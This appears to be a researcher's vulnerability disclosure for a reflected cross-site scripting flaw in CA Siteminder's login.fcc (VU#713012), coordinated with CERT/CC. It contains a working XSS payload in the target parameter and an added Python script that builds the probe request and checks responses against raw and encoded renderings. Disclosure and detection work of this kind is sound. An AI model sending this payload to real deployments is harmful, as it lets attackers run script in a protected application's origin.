Siteminder XSS In login.fcc

US-CERT and CERT/CC released VU#713012 today regarding a reflected cross-site scripting issue in which user input breaks out of an HTML attribute context. Below is a rehash of the notes we sent to CERT/CC. This was our first time coordinating a disclosure with CERT/CC. Overall, it was a great experience, considering we have not had the greatest experience disclosing directly to vendors. They were helpful during the whole process. If this was eBay, I’d give them A+++++++ feedback and would do business with them again :-)

<rehash>

How does the application work currently?
=========================================
CA Siteminder tries to be as seamless as possible when handling requests made with an expired session. If a user issues a request with an expired Siteminder session, Siteminder stores the request and re-authenticates the user. If the request was an HTTP POST, Siteminder stores the POST parameters, encrypts them and Base64-encodes the result. It then sends this value back in the subsequent response as a hidden form field:

<HTML>
<HEAD>
<TITLE>
</TITLE>
</HEAD>
<BODY onLoad="document.AUTOSUBMIT.submit();">This page is used to hold your data while you are being authorized for your request.<BR><BR>
You will be forwarded to continue the authorization process. If this does not happen automatically, please click the Continue button below.
<FORM NAME="AUTOSUBMIT" METHOD="POST" ENCTYPE="application/x-www-form-urlencoded" ACTION="[[Siteminder Reauth link]]">
<INPUT TYPE="HIDDEN" NAME="SMPostPreserve" VALUE="[[Base64(glob)]]">
<INPUT TYPE="SUBMIT" VALUE="Continue">
</FORM>
</BODY>
</HTML>

When the user re-authenticates, the SMPostPreserve value is eventually POSTed to the default Siteminder login.fcc page as the postpreservationdata parameter:

[some response]

<form id="LoginForm" name="LoginForm" action="/path/to/login.fcc" method="post" onsubmit="return jsDisableAndSubmit();" autocomplete="off">
<input type="hidden" id="target" name="target" value="$SM$/path/to/some.jsp" />
<input type="hidden" id="smauthreason" name="smauthreason" value="0" />
<input type="hidden" id="smagentname" name="smagentname" value="somevalue" />
<input type="hidden" id="templatedir" name="templatedir" value="/path/to/templates" />
<input type="hidden" id="postpreservationdata" name="postpreservationdata" value="[[Same Base64(glob)]]" />
</form>

Submitting this form fulfills the initial request.

How can the application be exploited?
=====================================
If Siteminder sees that the postpreservationdata parameter is set, it attempts to decode it. If decoding fails, it responds with the auto-submitting form below.

<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY onLoad="document.AUTOSUBMIT.submit();">
This page is used to hold your data while you are being authorized for your request.<BR><BR>
You will be forwarded to continue the authorization process. If this does not happen automatically, please click the Continue button below.
<FORM NAME="AUTOSUBMIT" METHOD="POST" ENCTYPE="application/x-www-form-urlencoded" ACTION="[[user supplied data here]]">
<$$smpostdata$$><INPUT TYPE="SUBMIT" VALUE="Continue">
</FORM>
</BODY>
</HTML>

If postpreservationdata is set to some invalid value such as “fail”, Siteminder takes the contents of the “target” POST parameter and places it in ACTION, expanding any magic Siteminder variables such as $SM$. The parameter may contain characters such as double quotes, which are neither validated nor encoded before insertion. This lets a malicious user escape from the HTML attribute context and inject additional HTML, giving a reflected cross-site scripting attack. Because the response is served from the Siteminder login page itself, the injected script runs in the origin of the protected application.

How do you reproduce the issue?
===============================

Send a POST to the Siteminder login.fcc form with the following body (URL-encode the target value in an actual request):

postpreservationdata=fail&target="><script>alert(1)</script><"

Some deployments require that target begin with a valid URL, or that other parameters such as USER be set.
</rehash>
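The following is an added example, not code from the advisory or from CA. It builds the login.fcc probe body from the reproduction step above, renders the auto-submit template two ways (target dropped into ACTION raw, as the write-up describes, and target HTML-attribute-encoded as a fix would do), and checks a response for the two signs that the attribute was escaped: a real script element appearing in the page, or the form's ACTION value being cut short at the injected quote. The template text and parameter names come from the page; the rendering functions and the check are assumptions made here so the whole thing runs offline.

```python
"""Probe builder and response check for the login.fcc reflected XSS.

Added example, not CA or CERT/CC code. The form-urlencoded body matches the
reproduction step in the write-up; render_vulnerable() and render_fixed() are
constructed stand-ins for the server so the check can be exercised offline.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlencode

# The payload from the reproduction step: closes the ACTION attribute and the
# FORM start tag, injects a script element, then re-opens a quote so the
# template's trailing '">' does not show up as stray text.
PAYLOAD = '"><script>alert(1)</script><"'

# The auto-submit page Siteminder returns when postpreservationdata cannot be
# decoded (copied from the write-up). {action} is where target lands.
AUTOSUBMIT_TEMPLATE = """<HTML>
<HEAD><TITLE></TITLE></HEAD>
<BODY onLoad="document.AUTOSUBMIT.submit();">
This page is used to hold your data while you are being authorized for your request.<BR><BR>
<FORM NAME="AUTOSUBMIT" METHOD="POST" ENCTYPE="application/x-www-form-urlencoded" ACTION="{action}">
<INPUT TYPE="SUBMIT" VALUE="Continue">
</FORM>
</BODY>
</HTML>
"""


def build_login_fcc_body(target=PAYLOAD, extra=None):
    """Return the POST body for login.fcc: postpreservationdata=fail plus target.

    Some deployments also need e.g. USER=... or a target that starts with a
    valid URL; pass those through `extra` / `target`. urlencode() does the
    percent-encoding the write-up leaves implicit.
    """
    params = {"postpreservationdata": "fail", "target": target}
    if extra:
        params.update(extra)
    return urlencode(params)


def render_vulnerable(target):
    """Constructed stand-in for the described behaviour: target goes into
    ACTION with no encoding (after any $SM$ expansion, which is not modelled)."""
    return AUTOSUBMIT_TEMPLATE.format(action=target)


def render_fixed(target):
    """Hardened variant: HTML-attribute-encode target before insertion.

    escape(quote=True) turns " into &quot; and < > & into entities, so the
    value can never terminate the attribute. Encoding must happen after
    $SM$ expansion, otherwise expanded output would be inserted raw again.
    """
    return AUTOSUBMIT_TEMPLATE.format(action=escape(target, quote=True))


class _ReflectionCollector(HTMLParser):
    """Record every FORM action and whether any <script> element exists."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.script_seen = False

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            # HTMLParser lower-cases names and entity-decodes values, so an
            # encoded reflection comes back as the original payload string.
            self.form_actions.append(dict(attrs).get("action"))
        elif tag == "script":
            self.script_seen = True


def analyze_reflection(response_html):
    """Parse a login.fcc response and report the form action(s) and script presence."""
    p = _ReflectionCollector()
    p.feed(response_html)
    p.close()
    return {"form_actions": p.form_actions, "script_injected": p.script_seen}


def reflection_is_exploitable(response_html, payload=PAYLOAD):
    """True if the payload broke out of the ACTION attribute.

    Two independent signals: a script element appeared, or a form's action
    value is a proper prefix of the payload, meaning the attribute ended at
    the injected double quote. A correctly encoded reflection yields the
    whole payload as the action and no script element.
    """
    info = analyze_reflection(response_html)
    truncated = any(
        a is not None and a != payload and payload.startswith(a)
        for a in info["form_actions"]
    )
    return info["script_injected"] or truncated


if __name__ == "__main__":
    # Against a live host the body below would be sent with e.g.
    #   curl -X POST --data "$(python3 this.py)" https://host/path/to/login.fcc
    print(build_login_fcc_body())
    print("raw reflection exploitable:", reflection_is_exploitable(render_vulnerable(PAYLOAD)))
    print("encoded reflection exploitable:", reflection_is_exploitable(render_fixed(PAYLOAD)))
```

The check deliberately parses the response rather than grepping for the literal payload: a deployment that rewrites or validates target (the "must begin with a valid URL" case) returns a different action value, which the prefix test does not mistake for a broken attribute.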